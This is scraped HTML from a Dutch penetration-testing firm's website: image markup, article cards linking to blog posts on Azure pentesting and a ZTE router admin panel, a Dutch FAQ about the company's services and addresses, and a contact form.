/_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F61e2ba4446041c77accc8276%252Fa6522ece437f68d0e93a1f74eff1a57a%252FAzure2.png%3Falt%3Dmedia&amp;w=360&amp;q=75 360w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F61e2ba4446041c77accc8276%252Fa6522ece437f68d0e93a1f74eff1a57a%252FAzure2.png%3Falt%3Dmedia&amp;w=384&amp;q=75 384w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F61e2ba4446041c77accc8276%252Fa6522ece437f68d0e93a1f74eff1a57a%252FAzure2.png%3Falt%3Dmedia&amp;w=425&amp;q=75 425w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F61e2ba4446041c77accc8276%252Fa6522ece437f68d0e93a1f74eff1a57a%252FAzure2.png%3Falt%3Dmedia&amp;w=480&amp;q=75 480w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F61e2ba4446041c77accc8276%252Fa6522ece437f68d0e93a1f74eff1a57a%252FAzure2.png%3Falt%3Dmedia&amp;w=640&amp;q=75 640w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F61e2ba4446041c77accc8276%252Fa6522ece437f68d0e93a1f74eff1a57a%252FAzure2.png%3Falt%3Dmedia&amp;w=750&amp;q=75 750w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F61e2ba4446041c77accc8276%252Fa6522ece437f68d0e93a1f74eff1a57a%252FAzure2.png%3Falt%3Dmedia&amp;w=828&amp;q=75 828w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F61e2ba4446041c77accc8276%252Fa6522ece437f68d0e93a1f74eff1a57a%252FAzure2.png%3Falt%3Dmedia&amp;w=1080&amp;q=75 1080w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F61e2ba4446041c77accc8276%252Fa6522ece437f68d0e93a1f74eff1a57a%252FAzure2.png%3Falt%3Dmedia&amp;w=1111&amp;q=75 1111w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F61e2ba4446041c77accc8276%252Fa6522ece437f68d0e93a1f74eff1a57a%252FAzure2.png%3Falt%3Dmedia&amp;w=1200&amp;q=75 1200w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F61e2ba4446041c77accc8276%252Fa6522ece437f68d0e93a1f74eff1a57a%252FAzure2.png%3Falt%3Dmedia&amp;w=1400&amp;q=75 1400w" src="/_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F61e2ba4446041c77accc8276%252Fa6522ece437f68d0e93a1f74eff1a57a%252FAzure2.png%3Falt%3Dmedia&amp;w=1400&amp;q=75"></div><article lang="en" class="fxcol gap-2"><h3 class="font-semibold xs:text-lg prose line-clamp-2 leading-normal break-words"><span lang="nl" class="inline bg-slate-200 border-slate-600 border text-whites text-xs rounded-md px-1 mr-1.5 xs:hidden font-normal">English</span>An Introductory Guide to Pentesting Azure: Benefits and Tools: Part 2</h3><p class="prose prose-sm line-clamp-2 max-w-[90%] max-xs:hidden"><span lang="nl" class="inline bg-slate-200 border-slate-600 border text-whites text-xs rounded-md px-1 mr-1.5">English</span>In this guide to pentesting Azure, we discuss the benefits of cloud penetration tests and the best Azure tools to identify &amp; fix vulnerabilities.</p><div lang="nl" class="flex items-center prose prose-sm max-sm:text-xs gap-1 xs:gap-5"><div class="text-dark-lave flex items-center gap-1.5 group group-hover:bg-dark-lave/10 p-1 px-3 rounded-full duration-150 hover:!bg-dark-lave/20 bg-dark-lave/10"><span>Lees Artikel</span> <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 24 24" height="16" width="16" xmlns="http://www.w3.org/2000/svg"><path d="M18.25 15.5a.75.75 0 0 1-.75-.75V7.56L7.28 17.78a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L16.44 6.5H9.25a.75.75 0 0 1 0-1.5h9a.75.75 0 0 1 .75.75v9a.75.75 0 0 1-.75.75Z"></path></svg></div></div></article></a><a class="flex items-center gap-3 group max-sm:col-span-2" href="https://websec.nl/blog/hack-zte-routers-admin-panel-66190e773cc251453bda7a0c"><div class="aspect-[16/12] max-w-[6rem] xs:hidden  grow rounded-md overflow-hidden shrink-0"><img alt="" loading="lazy" decoding="async" data-nimg="fill" class="object-cover !relative" style="position:absolute;height:100%;width:100%;left:0;top:0;right:0;bottom:0;color:transparent" sizes="220px" srcset="/_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F636b67e3cc690ab343826d44%252F21611fd52db6b202101137dbf5d4c1b1%252FRouterExploit.png%3Falt%3Dmedia&amp;w=16&amp;q=75 16w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F636b67e3cc690ab343826d44%252F21611fd52db6b202101137dbf5d4c1b1%252FRouterExploit.png%3Falt%3Dmedia&amp;w=32&amp;q=75 32w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F636b67e3cc690ab343826d44%252F21611fd52db6b202101137dbf5d4c1b1%252FRouterExploit.png%3Falt%3Dmedia&amp;w=48&amp;q=75 48w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F636b67e3cc690ab343826d44%252F21611fd52db6b202101137dbf5d4c1b1%252FRouterExploit.png%3Falt%3Dmedia&amp;w=60&amp;q=75 60w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F636b67e3cc690ab343826d44%252F21611fd52db6b202101137dbf5d4c1b1%252FRouterExploit.png%3Falt%3Dmedia&amp;w=64&amp;q=75 64w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F636b67e3cc690ab343826d44%252F21611fd52db6b202101137dbf5d4c1b1%252FRouterExploit.png%3Falt%3Dmedia&amp;w=96&amp;q=75 96w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F636b67e3cc690ab343826d44%252F21611fd52db6b202101137dbf5d4c1b1%252FRouterExploit.png%3Falt%3Dmedia&amp;w=120&amp;q=75 120w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F636b67e3cc690ab343826d44%252F21611fd52db6b202101137dbf5d4c1b1%252FRouterExploit.png%3Falt%3Dmedia&amp;w=128&amp;q=75 128w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F636b67e3cc690ab343826d44%252F21611fd52db6b202101137dbf5d4c1b1%252FRouterExploit.png%3Falt%3Dmedia&amp;w=220&amp;q=75 220w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F636b67e3cc690ab343826d44%252F21611fd52db6b202101137dbf5d4c1b1%252FRouterExploit.png%3Falt%3Dmedia&amp;w=256&amp;q=75 256w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F636b67e3cc690ab343826d44%252F21611fd52db6b202101137dbf5d4c1b1%252FRouterExploit.png%3Falt%3Dmedia&amp;w=360&amp;q=75 360w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F636b67e3cc690ab343826d44%252F21611fd52db6b202101137dbf5d4c1b1%252FRouterExploit.png%3Falt%3Dmedia&amp;w=384&amp;q=75 384w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F636b67e3cc690ab343826d44%252F21611fd52db6b202101137dbf5d4c1b1%252FRouterExploit.png%3Falt%3Dmedia&amp;w=425&amp;q=75 425w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F636b67e3cc690ab343826d44%252F21611fd52db6b202101137dbf5d4c1b1%252FRouterExploit.png%3Falt%3Dmedia&amp;w=480&amp;q=75 480w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F636b67e3cc690ab343826d44%252F21611fd52db6b202101137dbf5d4c1b1%252FRouterExploit.png%3Falt%3Dmedia&amp;w=640&amp;q=75 640w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F636b67e3cc690ab343826d44%252F21611fd52db6b202101137dbf5d4c1b1%252FRouterExploit.png%3Falt%3Dmedia&amp;w=750&amp;q=75 750w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F636b67e3cc690ab343826d44%252F21611fd52db6b202101137dbf5d4c1b1%252FRouterExploit.png%3Falt%3Dmedia&amp;w=828&amp;q=75 828w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F636b67e3cc690ab343826d44%252F21611fd52db6b202101137dbf5d4c1b1%252FRouterExploit.png%3Falt%3Dmedia&amp;w=1080&amp;q=75 1080w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F636b67e3cc690ab343826d44%252F21611fd52db6b202101137dbf5d4c1b1%252FRouterExploit.png%3Falt%3Dmedia&amp;w=1111&amp;q=75 1111w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F636b67e3cc690ab343826d44%252F21611fd52db6b202101137dbf5d4c1b1%252FRouterExploit.png%3Falt%3Dmedia&amp;w=1200&amp;q=75 1200w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F636b67e3cc690ab343826d44%252F21611fd52db6b202101137dbf5d4c1b1%252FRouterExploit.png%3Falt%3Dmedia&amp;w=1400&amp;q=75 1400w" src="/_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F636b67e3cc690ab343826d44%252F21611fd52db6b202101137dbf5d4c1b1%252FRouterExploit.png%3Falt%3Dmedia&amp;w=1400&amp;q=75"></div><article lang="en" class="fxcol gap-2"><h3 class="font-semibold xs:text-lg prose line-clamp-2 leading-normal break-words"><span lang="nl" class="inline bg-slate-200 border-slate-600 border text-whites text-xs rounded-md px-1 mr-1.5 xs:hidden font-normal">English</span>Hack ZTE router's admin panel</h3><p class="prose prose-sm line-clamp-2 max-w-[90%] max-xs:hidden"><span lang="nl" class="inline bg-slate-200 border-slate-600 border text-whites text-xs rounded-md px-1 mr-1.5">English</span>Let's say that you are connected to a public Wi-Fi. How difficult is it to crack the password to the admin panel of the router?</p><div lang="nl" class="flex items-center prose prose-sm max-sm:text-xs gap-1 xs:gap-5"><div class="text-dark-lave flex items-center gap-1.5 group group-hover:bg-dark-lave/10 p-1 px-3 rounded-full duration-150 hover:!bg-dark-lave/20 bg-dark-lave/10"><span>Lees Artikel</span> <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 24 24" height="16" width="16" xmlns="http://www.w3.org/2000/svg"><path d="M18.25 15.5a.75.75 0 0 1-.75-.75V7.56L7.28 17.78a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L16.44 6.5H9.25a.75.75 0 0 1 0-1.5h9a.75.75 0 0 1 .75.75v9a.75.75 0 0 1-.75.75Z"></path></svg></div></div></article></a></div></section><section class="px-5 max-w-6xl mx-auto xl:px-0 my-20 md:my-24 lg:my-36"><h2 class="text-2xl md:text-3xl lg:text-4xl 2xl:text-[2.75rem] font-semibold !leading-snug text-center max-w-5xl">Veel Gestelde Vragen</h2><div class="flex xs:my-12 lg:my-14 max-lg:flex-col"><div style="margin-top:85px" class="h-[22rem] lg:h-[24rem] w-full lg:block relative max-lg:!mt-0"><img alt="decorative image about frequently asked questions" loading="lazy" decoding="async" data-nimg="fill" class="object-contain" style="position:absolute;height:100%;width:100%;left:0;top:0;right:0;bottom:0;color:transparent" sizes="(max-width: 768px) 100vw, (max-width: 1080px) 45vw, 30vw" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ffaq-cropped-edited.75c279d9.png&amp;w=32&amp;q=85 32w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ffaq-cropped-edited.75c279d9.png&amp;w=48&amp;q=85 48w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ffaq-cropped-edited.75c279d9.png&amp;w=60&amp;q=85 60w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ffaq-cropped-edited.75c279d9.png&amp;w=64&amp;q=85 64w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ffaq-cropped-edited.75c279d9.png&amp;w=96&amp;q=85 96w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ffaq-cropped-edited.75c279d9.png&amp;w=120&amp;q=85 120w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ffaq-cropped-edited.75c279d9.png&amp;w=128&amp;q=85 128w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ffaq-cropped-edited.75c279d9.png&amp;w=220&amp;q=85 220w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ffaq-cropped-edited.75c279d9.png&amp;w=256&amp;q=85 256w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ffaq-cropped-edited.75c279d9.png&amp;w=360&amp;q=85 360w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ffaq-cropped-edited.75c279d9.png&amp;w=384&amp;q=85 384w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ffaq-cropped-edited.75c279d9.png&amp;w=425&amp;q=85 425w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ffaq-cropped-edited.75c279d9.png&amp;w=480&amp;q=85 480w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ffaq-cropped-edited.75c279d9.png&amp;w=640&amp;q=85 640w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ffaq-cropped-edited.75c279d9.png&amp;w=750&amp;q=85 750w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ffaq-cropped-edited.75c279d9.png&amp;w=828&amp;q=85 828w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ffaq-cropped-edited.75c279d9.png&amp;w=1080&amp;q=85 1080w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ffaq-cropped-edited.75c279d9.png&amp;w=1111&amp;q=85 1111w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ffaq-cropped-edited.75c279d9.png&amp;w=1200&amp;q=85 1200w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ffaq-cropped-edited.75c279d9.png&amp;w=1400&amp;q=85 1400w" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ffaq-cropped-edited.75c279d9.png&amp;w=1400&amp;q=85"></div><div class="flex flex-col gap-ten lg:shrink-0 lg:w-[55%] z-1"><div class="px-5 xs:px-7 shadow-faq border border-serviceCard bg-white rounded-ten overflow-y-hidden"><div class="flex items-baseline justify-between md:text-base text-sm lg:text-lg py-5"><div class="font-semibold">Wie is WebSec?</div><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-chevron-down duration-300 shrink-0 w-5 lg:w-6 relative top-1 rotate-180"><path d="m6 9 6 6 6-6"></path></svg></div><div class="markdown duration-200 opacity-1 pb-7">WebSec is een organisatie met een missie en visie die volledig gericht is op IT-beveiliging. WebSec is specialist op het gebied van offensieve beveiliging. WebSec heeft specialisten in dienst die zeer geavanceerd zijn op het gebied van penetratietesten, code review en beveiligingsbewustzijn.</div></div><div class="px-5 xs:px-7 shadow-faq border border-serviceCard bg-white rounded-ten overflow-y-hidden"><div class="flex items-baseline justify-between md:text-base text-sm lg:text-lg py-5"><div class="">Wat doet WebSec?</div><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-chevron-down duration-300 shrink-0 w-5 lg:w-6 relative top-1"><path d="m6 9 6 6 6-6"></path></svg></div><div class="markdown duration-200 h-0">WebSec heeft ethische hackers (ook wel IT-beveiligingsconsultants, penetratietesters of pentesters genoemd). We zetten deze collega's in bij klanten om fouten en beveiligingsproblemen in hun informatiesystemen, netwerken, applicaties en servers op te sporen, om zo hun beveiliging te optimaliseren. Deze professionals kennen de werkwijze en denkwijze van een hacker, deze kennis wordt gebruikt door onze beveiligingsexperts om een veilige IT-omgeving voor onze klanten te waarborgen.</div></div><div class="px-5 xs:px-7 shadow-faq border border-serviceCard bg-white rounded-ten overflow-y-hidden"><div class="flex items-baseline justify-between md:text-base text-sm lg:text-lg py-5"><div class="">Waar is WebSec gevestigd?</div><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-chevron-down duration-300 shrink-0 w-5 lg:w-6 relative top-1"><path d="m6 9 6 6 6-6"></path></svg></div><div class="markdown duration-200 h-0"><p>We zijn momenteel geregistreerd op Keurenplein 41, UNIT A6260, 1069 CD Amsterdam, Nederland.<br>Ons United States adres is 1021 E Lincolnway Suite #6400, Cheyenne, Wyoming 82001</p>
</div></div><div class="px-5 xs:px-7 shadow-faq border border-serviceCard bg-white rounded-ten overflow-y-hidden"><div class="flex items-baseline justify-between md:text-base text-sm lg:text-lg py-5"><div class="">Wanneer is WebSec opgericht?</div><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-chevron-down duration-300 shrink-0 w-5 lg:w-6 relative top-1"><path d="m6 9 6 6 6-6"></path></svg></div><div class="markdown duration-200 h-0">De handelsnaam WebSec bestaat al vier jaar, eerder geregistreerd bij de Kamer van Koophandel onder de naam 'OS.SI Consulting B.V.' Sinds 3 augustus 2020 is WebSec een onafhankelijk beveiligingsbedrijf geworden onder een moederbedrijf 'WebSec Holding B.V.'</div></div><div class="px-5 xs:px-7 shadow-faq border border-serviceCard bg-white rounded-ten overflow-y-hidden"><div class="flex items-baseline justify-between md:text-base text-sm lg:text-lg py-5"><div class="">Waarom kiezen voor WebSec?</div><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-chevron-down duration-300 shrink-0 w-5 lg:w-6 relative top-1"><path d="m6 9 6 6 6-6"></path></svg></div><div class="markdown duration-200 h-0"><p>Omdat WebSec flexibiliteit, diversiteit, transparantie, snelheid en professionaliteit kan bieden voor de beste kwaliteit tegen onverslaanbare tarieven.</p>
<p><strong>Divers:</strong> Wij zijn momenteel de enige IT-beveiligingsorganisatie in Nederland die een alles-in-één beveiligingsoplossing abonnement kan bieden, bijvoorbeeld: onze klanten met een beveiligingsabonnement kunnen in januari een beveiligingsbeoordeling (pentest) doen en in februari een phishing-campagne zonder extra kosten.</p>
<p><strong>Flexibel:</strong> Aangezien het minimale contract één jaar is, kunnen we deze professionele beveiligingsprojecten tegen een lagere prijs uitvoeren voor een vast bedrag per maand.<br>Ook als onze klanten met een beveiligingsabonnement niet zeker weten welke maandelijkse dienst ze nodig hebben, hebben ze de mogelijkheid om het aantal uren naar de volgende maand over te dragen, waardoor ruimte ontstaat voor grotere opdrachten.</p>
<p><strong>Professioneel:</strong> In tegenstelling tot onze concurrenten kunnen wij de hoogst mogelijke kwaliteit van werk bieden, zonder onze klanten te veel te belasten of onze kwaliteitsnormen in gevaar te brengen.<br>Daarom garanderen wij klanttevredenheid en de beveiliging &amp; bescherming van de IT-omgevingen van onze klanten het hele jaar door tegen de nieuwste bekende en onbekende cyberdreigingen.</p>
<p><strong>Wendbaar:</strong> WebSec heeft geen wachttijden, WebSec kan een opdracht onmiddellijk starten na het bespreken van een startdatum en het ondertekenen van het benodigde juridische papierwerk.<br>Bij WebSec bestaan er geen wachttijden of extra kosten voor spoedbestellingen.<br>WebSec is 24/7 telefonisch bereikbaar voor onze klanten en we zijn klaar om in te grijpen in geval van beveiligingsincidenten, niet alleen binnen de EU maar bijna overal ter wereld.</p>
<p><strong>Transparantie:</strong> Bij WebSec vinden we communicatie met onze klanten erg belangrijk, we streven ernaar om altijd de meest professionele ervaring te bieden.<br>Op deze manier houden we altijd nauwlettend in de gaten hoe, wat en wanneer en houden we onze klanten op de hoogte van elk evenement.<br>Onze kernwaarden zijn Integriteit, Vertrouwelijkheid en Beschikbaarheid. Daarom blijven onze klanten nooit in het duister, maar staan ze altijd in onze schijnwerpers.</p>
</div></div></div></div></section><section class="max-w-6xl flex gap-10 justify-between items-stretch mx-5 my-20 lg:my-40 lg:mx-auto lg:px-5 text-[#383240]"><form class="grow xl:max-w-[35rem] max-w-[30rem] mx-auto"><fieldset><h2 class="text-[1.6rem] font-semibold text-center xs:text-3xl sm:text-4xl md:text-[2.5rem] 2xl:text-[3rem]"><div class="lg:text-left">Contact</div></h2><p class="section-summary lg:text-left mx-auto lg:mx-0 text-center my-4">Wij bieden superieure IT-beveiligingsdiensten door werk van onverslaanbare kwaliteit. Neem vandaag nog contact met ons op!</p><div class="rounded-md h-60 overflow-hidden my-8 lg:hidden bg-gray-50"><div class="h-full w-full"></div></div><div class="flex flex-col gap-3 my-8"><div class="flex gap-3"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 384 512" class="fill-sig-red mt-1" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg"><path d="M215.7 499.2C267 435 384 279.4 384 192C384 86 298 0 192 0S0 86 0 192c0 87.4 117 243 168.3 307.2c12.3 15.3 35.1 15.3 47.4 0zM192 128a64 64 0 1 1 0 128 64 64 0 1 1 0-128z"></path></svg><div class="text-13 md:text-sm lg:text-base">Keurenplein 41, UNIT A6260 <br>Amsterdam, 1069 CD <br>Nederland</div></div><div class="flex gap-3 items-center"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 16 16" class="fill-sig-red" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" d="M1.885.511a1.745 1.745 0 0 1 2.61.163L6.29 2.98c.329.423.445.974.315 1.494l-.547 2.19a.68.68 0 0 0 .178.643l2.457 2.457a.68.68 0 0 0 .644.178l2.189-.547a1.75 1.75 0 0 1 1.494.315l2.306 1.794c.829.645.905 1.87.163 2.611l-1.034 1.034c-.74.74-1.846 1.065-2.877.702a18.6 18.6 0 0 1-7.01-4.42 18.6 18.6 0 0 1-4.42-7.009c-.362-1.03-.037-2.137.703-2.877z"></path></svg><div class="text-13 md:text-sm lg:text-base">+31 (0) 850 02 30 61</div></div><div class="flex gap-3 items-center"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 512 512" class="fill-sig-red" height="19" width="19" xmlns="http://www.w3.org/2000/svg"><path d="M437.332 80H74.668C51.199 80 32 99.198 32 122.667v266.666C32 412.802 51.199 432 74.668 432h362.664C460.801 432 480 412.802 480 389.333V122.667C480 99.198 460.801 80 437.332 80zM432 170.667L256 288 80 170.667V128l176 117.333L432 128v42.667z"></path></svg><div class="text-13 md:text-sm lg:text-base">[email protected]</div></div></div><div class="flex flex-col gap-3"><div><div class="relative flex w-full h-12 lg:h-[3.3rem] xl:h-[3.75rem] group"><div class="absolute h-full w-full group-focus-within:scale-[1.01] group-focus-within:border-dark-lave group-focus-within:group-hover:border-dark-lave group-hover:border-dark-lave/50 group-focus-within:scale-y-110 duration-150 rounded-ten border border-[#D9D9D9]"></div><input type="text" name="name" placeholder="Volledige Naam" class="relative w-full h-full px-6 text-sm bg-transparent border-none rounded-ten disabled:bg-gray-200 outline-none lg:text-base"></div></div><div><div class="relative flex w-full h-12 lg:h-[3.3rem] xl:h-[3.75rem] group"><div class="absolute h-full w-full group-focus-within:scale-[1.01] group-focus-within:border-dark-lave group-focus-within:group-hover:border-dark-lave group-hover:border-dark-lave/50 group-focus-within:scale-y-110 duration-150 rounded-ten border border-[#D9D9D9]"></div><input type="text" name="email" placeholder="[email protected]" class="relative w-full h-full px-6 text-sm bg-transparent border-none rounded-ten disabled:bg-gray-200 outline-none lg:text-base"></div></div><div class="grid xl:grid-cols-2 gap-3"><div><div class="relative flex w-full h-12 lg:h-[3.3rem] xl:h-[3.75rem] group"><div class="absolute h-full w-full group-focus-within:scale-[1.01] group-focus-within:border-dark-lave group-focus-within:group-hover:border-dark-lave group-hover:border-dark-lave/50 group-focus-within:scale-y-110 duration-150 rounded-ten border border-[#D9D9D9]"></div><input type="text" name="phone" placeholder="+31 (0) 85 1234567" class="relative w-full h-full px-6 text-sm bg-transparent border-none rounded-ten disabled:bg-gray-200 outline-none lg:text-base"></div></div><div><div class="relative flex w-full h-12 lg:h-[3.3rem] xl:h-[3.75rem] group"><div class="absolute h-full w-full group-focus-within:scale-[1.01] group-focus-within:border-dark-lave group-focus-within:group-hover:border-dark-lave group-hover:border-dark-lave/50 group-focus-within:scale-y-110 duration-150 rounded-ten border border-[#D9D9D9]"></div><input type="text" name="companyUrl" placeholder="Uw Website" class="relative w-full h-full px-6 text-sm bg-transparent border-none rounded-ten disabled:bg-gray-200 outline-none lg:text-base"></div></div></div><div class=""><div class="relative flex w-full group"><div class="absolute inset-0  group-focus-within:border-dark-lave group-focus-within:group-hover:border-dark-lave group-hover:border-dark-lave/50 group-focus-within:-inset-1 duration-150 rounded-ten border border-[#D9D9D9]"></div><textarea id=":R25dq6:" rows="6" name="message" placeholder="Hoe kunnen wij helpen?" class="h-full w-full text-sm py-3.5 min-h-[3rem]s lg:text-base bg-transparent rounded-ten disabled:bg-gray-200 disabled:text-gray-500 border-none outline-none px-6 relative resize-y"></textarea></div></div><div class="my-3 space-y-3"><div><label aria-disabled="false" class="flex w-full gap-3 cursor-pointer aria-disabled:cursor-default group focus:outline-none " tabindex="0"><div class="w-5 h-5 mt-[3px] shrink-0 fxc relative"><div class="absolute inset-0 rounded-md border-[#D9D9D9] border duration-200 group-focus:scale-110 group-hover:scale-[1.2] group-focus:border-dark-lave group-hover:border-dark-lave"></div><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 16 16" class="duration-100 opacity-0 scale-75" height="14" width="14" xmlns="http://www.w3.org/2000/svg"><path d="M12.736 3.97a.733.733 0 0 1 1.047 0c.286.289.29.756.01 1.05L7.88 12.01a.733.733 0 0 1-1.065.02L3.217 8.384a.757.757 0 0 1 0-1.06.733.733 0 0 1 1.047 0l3.052 3.093 5.4-6.425z"></path></svg></div><div class="text-sm lg:text-base text-zinc-700 leading-relaxed">Meld u aan voor onze nieuwsbrief</div><input name="subscribedToNewsletter" type="checkbox" class="hidden" value=""></label></div><div><label aria-disabled="false" class="flex w-full gap-3 cursor-pointer aria-disabled:cursor-default group focus:outline-none " 